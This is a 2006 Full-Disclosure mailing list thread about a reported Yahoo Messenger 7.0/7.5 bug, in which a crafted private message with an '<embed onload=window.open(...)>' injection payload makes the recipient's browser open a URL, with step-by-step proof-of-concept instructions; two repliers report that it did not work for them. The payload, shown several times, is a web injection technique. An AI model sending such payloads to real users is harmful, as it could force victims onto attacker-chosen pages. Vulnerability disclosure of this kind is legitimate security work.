[Full-disclosure] Yahoo messenger serious bug
evilrabbi
evilrabbi at gmail.com
Fri Jul 28 17:22:06 BST 2006
didnt' work for me either.
On 7/28/06, John Dietz <www.whitewolf at gmail.com> wrote:
>
> I just tried this in Mesenger 7.0 and it never opened a browser window. I
> copied the text exactly from here and made sure the space after helomsg was
> [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the
> string. Other side sees:
>
> s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg<?#@@*-%29?@+%23@;?%28msg>:
> ---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>:
> ---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
> Yahoo! Search: No results were found for helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>:
> ---------------------------------------------<embed
>
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>:
> ---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(.
>
> There must be some other settings on either mesenger or the computer
> itself for this to work as you say. Possibly a setting for mesenger to use
> your default browser for searches in stead of the PM window?
>
> Cheers
>
>
> On 7/28/06, Ivan Ivan <ivancool2003 at yahoo.com.ar> wrote:
> >
> > Hi,
> > I found another vulnerability in yahoo messenger that
> > if you receive a Private message with this string
> >
> > "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> > onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> >
> > onload=window.open
> > ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
> > (without quotes) Yahoo messenger open in this case
> > google.com in the internet explorer of the remote
> > victim.
> >
> > Yahoo messenger bug proof of concept:
> >
> > 1. Open messenger and log it.
> >
> > 2. Open a yahoo chat third party like yahelite through
> > Ymsgr protocol and log it with another account.
> >
> > 3. Send a Pm to the messenger account with this
> > string: s: helomsg
> >
> > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> > onload=window.open('http:\\\\google.com/')>helomsg
> > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> >
> > onload=window.open('http:\\\\google.com/')>helomsg
> > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
> >
> > 4. The remote user will open www.google.com (you can
> > change)
> >
> > Note: "helomsg :" this space must be created with
> > alt+0160 and this "s: " with a space
> >
> >
> > s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> > onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> >
> > onload=window.open
> > ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
> >
> > Tested in yahoo messenger 7.0/7.5
> >
> >
> > Regards.
> >
> >
> >
> >
> >
> > __________________________________________________
> > Preguntá. Respondé. Descubrí.
> > Todo lo que querías saber, y lo que ni imaginabas,
> > está en Yahoo! Respuestas (Beta).
> > ¡Probalo ya!
> > http://www.yahoo.com.ar/respuestas
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> There is intelligence is in having all the answers, but wisdom lies in
> knowing which of the questions to answer.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
--
-- h0 h0 h0 --
www.nopsled.net
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060728/745a8796/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.